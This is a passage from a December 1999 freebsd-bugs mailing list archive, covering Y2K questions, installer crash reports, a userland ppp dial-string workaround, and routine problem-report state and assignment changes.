Dec 1999 04:13:36 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA52039; Mon, 20 Dec 1999 04:13:36 -0800 (PST) (envelope-from sheldonh@FreeBSD.org) Date: Mon, 20 Dec 1999 04:13:36 -0800 (PST) From: Message-Id: <199912201213.EAA52039@freefall.freebsd.org> To: wollman@khavrinen.lcs.mit.edu, sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/15472: bug in in_cksum_finalize Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: bug in in_cksum_finalize State-Changed-From-To: open->suspended State-Changed-By: sheldonh State-Changed-When: Mon Dec 20 04:12:42 PST 1999 State-Changed-Why: Committed as rev 1.17 of in_cksum.c . MFC candidate. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 5:20:45 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from webweaving.org (dialfwn05.fwn.rug.nl [129.125.32.155]) by hub.freebsd.org (Postfix) with ESMTP id 00FAB15269 for ; Mon, 20 Dec 1999 05:20:40 -0800 (PST) (envelope-from n_hibma@webweaving.org) Received: from localhost (localhost [127.0.0.1]) by webweaving.org (8.9.3/8.9.3) with ESMTP id NAA00411; Mon, 20 Dec 1999 13:59:37 +0100 (CET) (envelope-from n_hibma@webweaving.org) Date: Mon, 20 Dec 1999 13:59:37 +0100 (CET) From: Nick Hibma X-Sender: n_hibma@localhost Reply-To: Nick Hibma To: Linda.Ward@mcc.ac.uk Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: Elm 2.4 Y2K bugs In-Reply-To: <199912201008.KAA12446@nessie.mcc.ac.uk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You'll have to ask the developers of the software for this, not the developers of the OS it is running on. Please see the documentation for Elm 2.4 Nick On Mon, 20 Dec 1999, Linda Ward wrote: > Hello, > Can you please tell me what the specific Y2K issues are with Elm 2.4 > > TIA, > > Linda. > > > -- > email:- Postmistress@mcc.ac.uk > phone:- +44 (0)161-275-6004 fax:- +44 (0)161-275-6040 > > Network & Operations Group, Manchester Computing, The University, M13 9PL. > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-bugs" in the body of the message > -- n_hibma@webweaving.org n_hibma@freebsd.org USB project http://www.etla.net/~n_hibma/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 5:31:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from pouet.grolier.fr (pouet.grolier.fr [194.117.201.37]) by hub.freebsd.org (Postfix) with ESMTP id 2DEC314BC5 for ; Mon, 20 Dec 1999 05:31:47 -0800 (PST) (envelope-from juju@pouet.grolier.fr) Received: (from juju@localhost) by pouet.grolier.fr (8.9.3/8.9.3) id OAA18723 for freebsd-bugs@FreeBSD.org; Mon, 20 Dec 1999 14:32:56 +0100 (MET) Date: Mon, 20 Dec 1999 14:32:56 +0100 From: Julien Bornstein To: freebsd-bugs@FreeBSD.org Message-ID: <19991220143256.A18711@pouet.grolier.fr> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.1i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I ve tried to install 3.4-Release booting with floppies, I m going 1st in keymap, put french, then in Custom, partion, label then Distributions. When i select CUSTOM, i caught a Signal 11 :( -- .:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:. Julien Bornstein - Administrateur Systemes . . GROLIER INTERACTIVE Europe / Online Groupe _\/ \/_ 11 rue de Cambrai - 75927 Paris Cedex 19 - France _\/\/_ Tel : + 33 1 55 45 19 29 - Fax : + 33 1 55 45 47 30 _\_\_\/\/_/_/_ email : Julien.Bornstein@grolier.fr / /_/\/\_\ \ _/\/\_ Joyeux Noel /\ /\ ' ` :*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:._.:*~*:. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 6: 7:37 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from inner.cortx.com (inner.cortx.com [216.22.141.8]) by hub.freebsd.org (Postfix) with ESMTP id 7EEE514C02 for ; Mon, 20 Dec 1999 06:07:32 -0800 (PST) (envelope-from costa@cortexgroup.com) Received: from cortexmobile ([216.91.232.124]) by inner.cortx.com (8.8.8/8.8.8 NO RELAY NO SPAM) with SMTP id JAA05654 for ; Mon, 20 Dec 1999 09:10:48 -0500 (EST) Reply-To: From: "Constantine J. Morris" To: Subject: y2k concerns... Date: Mon, 20 Dec 1999 09:10:41 -0500 Message-ID: <000901bf4af4$00a2fb20$2fd2a8c0@cortx.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org i have checked out the y2k piece on the freebsd web site but i'm still a little concerned. i have 2.2.7 RELEASE running apache 1.2.6 and sendmail 8.8.8. do i need to make any changes or upgrades, or is this config y2k compliant. i know the hrdware is, i'm just concerned about the OS and major apps. please email me at costa@cortexgroup.com thanks! -------------------------------------- CORTEX GROUP Constantine J. Morris Senior Partner Chief Technology Officer 516.484.8460 ext. 12 Costa@CortexGroup.com -------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 6:10:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id D4CB4152FF for ; Mon, 20 Dec 1999 06:10:57 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 6D25F1C59; Mon, 20 Dec 1999 09:10:28 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 684F0381B; Mon, 20 Dec 1999 09:10:28 -0500 (EST) Date: Mon, 20 Dec 1999 09:10:28 -0500 (EST) From: Bill Fumerola To: "Constantine J. Morris" Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: y2k concerns... In-Reply-To: <000901bf4af4$00a2fb20$2fd2a8c0@cortx.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 20 Dec 1999, Constantine J. Morris wrote: > i have checked out the y2k piece on the freebsd web site but i'm still a > little concerned. i have 2.2.7 RELEASE running apache 1.2.6 and sendmail > 8.8.8. do i need to make any changes or upgrades, or is this config y2k > compliant. i know the hrdware is, i'm just concerned about the OS and major > apps. please email me at Had you really read the web page, you would know the answer to all your questions. -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 7:45:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B11D14FE7; Mon, 20 Dec 1999 07:45:56 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA24186; Mon, 20 Dec 1999 07:45:56 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 07:45:56 -0800 (PST) From: Message-Id: <199912201545.HAA24186@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/14747: can't install docs 'cause lynx isn't there Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: can't install docs 'cause lynx isn't there Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 07:45:19 PST 1999 Responsible-Changed-Why: Over to Mr. Sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 7:47:36 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C6E0014CD0; Mon, 20 Dec 1999 07:47:34 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA24445; Mon, 20 Dec 1999 07:47:34 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 07:47:34 -0800 (PST) From: Message-Id: <199912201547.HAA24445@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/14795: Core Dump of /stand/sysinstall Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Core Dump of /stand/sysinstall Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 07:46:59 PST 1999 Responsible-Changed-Why: Over to Mr. Sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 7:48:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AFA70152CB; Mon, 20 Dec 1999 07:48:58 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA24659; Mon, 20 Dec 1999 07:48:58 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 07:48:58 -0800 (PST) From: Message-Id: <199912201548.HAA24659@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, ache@FreeBSD.org Subject: Re: misc/14999: ISO8859-5 locale missing from RELENG_3 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ISO8859-5 locale missing from RELENG_3 Responsible-Changed-From-To: freebsd-bugs->ache Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 07:48:16 PST 1999 Responsible-Changed-Why: Over to Mr. Locale To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 7:53:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2AECE14E8C; Mon, 20 Dec 1999 07:53:25 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA26624; Mon, 20 Dec 1999 07:53:25 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 07:53:25 -0800 (PST) From: Message-Id: <199912201553.HAA26624@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/13867: Cannot install source of X11 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Cannot install source of X11 Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 07:52:53 PST 1999 Responsible-Changed-Why: Over to sysinstall owner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 7:56:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A997615316; Mon, 20 Dec 1999 07:56:12 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA26820; Mon, 20 Dec 1999 07:56:12 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 07:56:12 -0800 (PST) From: Message-Id: <199912201556.HAA26820@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/14099: zh, ja, ru, es, files Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: zh, ja, ru, es, files Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 07:55:20 PST 1999 Responsible-Changed-Why: Jhordan's area To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 7:57: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4602D152CB; Mon, 20 Dec 1999 07:57:07 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA26943; Mon, 20 Dec 1999 07:57:07 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 07:57:07 -0800 (PST) From: Message-Id: <199912201557.HAA26943@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-doc@FreeBSD.org Subject: Re: misc/14253: Mistake in dhclient-script(8) man page Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Mistake in dhclient-script(8) man page Responsible-Changed-From-To: freebsd-bugs->freebsd-doc Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 07:56:43 PST 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 7:59:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 96030152C9; Mon, 20 Dec 1999 07:59:55 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA27152; Mon, 20 Dec 1999 07:59:55 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 07:59:55 -0800 (PST) From: Message-Id: <199912201559.HAA27152@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/14428: can't install from extended DOS partition Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: can't install from extended DOS partition Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 07:59:25 PST 1999 Responsible-Changed-Why: Over to Mr. Sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 8:11:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 40E2615256; Mon, 20 Dec 1999 08:11:58 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA28287; Mon, 20 Dec 1999 08:11:58 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 08:11:58 -0800 (PST) From: Message-Id: <199912201611.IAA28287@freefall.freebsd.org> To: adam@xpert.com, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/14523: mistake in traceroute `FREEBSD-upgrade' file Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: mistake in traceroute `FREEBSD-upgrade' file State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Mon Dec 20 08:11:25 PST 1999 State-Changed-Why: Fixed. Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 8:14:56 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B251D15250; Mon, 20 Dec 1999 08:14:55 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA28675; Mon, 20 Dec 1999 08:14:55 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 08:14:55 -0800 (PST) From: Message-Id: <199912201614.IAA28675@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/13807: data-sensitivity buglet in 'make release' BUILDNAME Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: data-sensitivity buglet in 'make release' BUILDNAME Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 08:14:19 PST 1999 Responsible-Changed-Why: Over to Release manager To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 8:20: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id EB37C152F0 for ; Mon, 20 Dec 1999 08:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA29295; Mon, 20 Dec 1999 08:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id DEAB91536F; Mon, 20 Dec 1999 08:17:00 -0800 (PST) Message-Id: <19991220161700.DEAB91536F@hub.freebsd.org> Date: Mon, 20 Dec 1999 08:17:00 -0800 (PST) From: poortom@apmisc.ibm.co.jp To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/15582: userland ppp dialup fail with AtermIT Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15582 >Category: bin >Synopsis: userland ppp dialup fail with AtermIT >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 08:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Tomoyuki Niijima >Release: 3.3 >Organization: IBM Japan >Environment: FreeBSD ajisaiso 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386 >Description: I don't know this is a really a bug of ppp, but it seems that the program send AT commands to quick after opens serial port while my TA is not ready to receive AT commands. >How-To-Repeat: Using default /etc/ppp/ppp.conf, change and add device, phone, authname, authkey entries, then start userland ppp to dialup. My TA returns ERROR just after ppp sends ATD command to dial. With the same environment, it works with MODEM (Microcom V.34 ES II). >Fix: One thing I found to workaround this problem is to add \\d before the first AT command in dial string to wait for a while after ppp opens serial port. set dial "ABORT BUSY ABORT NO\\sCARRIER TIMEOUT 5 \"\" \\dAT OK-AT-OK ATE1Q0 OK \\dATDT\\T TIMEOUT 40 CONNECT" >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 8:46:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D5C4A14CE4; Mon, 20 Dec 1999 08:46:41 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA32197; Mon, 20 Dec 1999 08:46:41 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 08:46:41 -0800 (PST) From: Message-Id: <199912201646.IAA32197@freefall.freebsd.org> To: obonilla@fisicc-ufm.edu, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/13275: inter.phone has old codes for Guatemala Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: inter.phone has old codes for Guatemala State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Mon Dec 20 08:46:17 PST 1999 State-Changed-Why: Fixed. Thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 8:55:52 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F172114CE7; Mon, 20 Dec 1999 08:55:50 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA33040; Mon, 20 Dec 1999 08:55:50 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Mon, 20 Dec 1999 08:55:50 -0800 (PST) From: Message-Id: <199912201655.IAA33040@freefall.freebsd.org> To: Joel.Faedi@esial.u-nancy.fr, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/15581: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 State-Changed-From-To: closed->open State-Changed-By: cpiazza State-Changed-When: Mon Dec 20 08:55:21 PST 1999 State-Changed-Why: This PR should be the one to stay open; it has a fix attached. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 8:56:18 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7197915347; Mon, 20 Dec 1999 08:56:17 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA33189; Mon, 20 Dec 1999 08:56:17 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Mon, 20 Dec 1999 08:56:17 -0800 (PST) From: Message-Id: <199912201656.IAA33189@freefall.freebsd.org> To: Joel.Faedi@esial.u-nancy.fr, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/15580: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Mon Dec 20 08:55:58 PST 1999 State-Changed-Why: Superseded by PR 15581 (which has a patch) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 9: 8:47 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5C50415293; Mon, 20 Dec 1999 09:08:46 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA34641; Mon, 20 Dec 1999 09:08:45 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 09:08:45 -0800 (PST) From: Message-Id: <199912201708.JAA34641@freefall.freebsd.org> To: pi@LF.net, phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: misc/13152: systemwide username too short (currently 16 char, should be 64 or so) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: systemwide username too short (currently 16 char, should be 64 or so) State-Changed-From-To: open->closed State-Changed-By: phantom State-Changed-When: Mon Dec 20 09:04:53 PST 1999 State-Changed-Why: You did not provide any real example. My experience shown that 16 chars is *really* enough. Anyway aliases(5) is your friend. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 9:14:18 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2B909152F6; Mon, 20 Dec 1999 09:14:17 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA35456; Mon, 20 Dec 1999 09:14:17 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 09:14:17 -0800 (PST) From: Message-Id: <199912201714.JAA35456@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, peter@FreeBSD.org Subject: Re: misc/13117: CVS repo src/lib/libc_r/uthread incorrectly tagged Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: CVS repo src/lib/libc_r/uthread incorrectly tagged Responsible-Changed-From-To: freebsd-bugs->peter Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 09:13:45 PST 1999 Responsible-Changed-Why: CVS manager's area To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 9:19:37 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 48BC715342; Mon, 20 Dec 1999 09:19:36 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA35986; Mon, 20 Dec 1999 09:19:36 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 09:19:36 -0800 (PST) From: Message-Id: <199912201719.JAA35986@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/13089: sysinstall repeatedly installs a distribution file Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: sysinstall repeatedly installs a distribution file Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 09:18:58 PST 1999 Responsible-Changed-Why: Over Mr. Sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 9:35:55 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 14C671535A; Mon, 20 Dec 1999 09:35:49 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA37441; Mon, 20 Dec 1999 09:35:48 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Mon, 20 Dec 1999 09:35:48 -0800 (PST) From: Message-Id: <199912201735.JAA37441@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, phantom@FreeBSD.org Subject: Re: misc/12228: /etc/security don't search in all the files Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: /etc/security don't search in all the files Responsible-Changed-From-To: freebsd-bugs->phantom Responsible-Changed-By: phantom Responsible-Changed-When: Mon Dec 20 09:34:05 PST 1999 Responsible-Changed-Why: Patch commited in -CURRENT. I'll merge it to -STABLE soon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 9:48: 0 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org 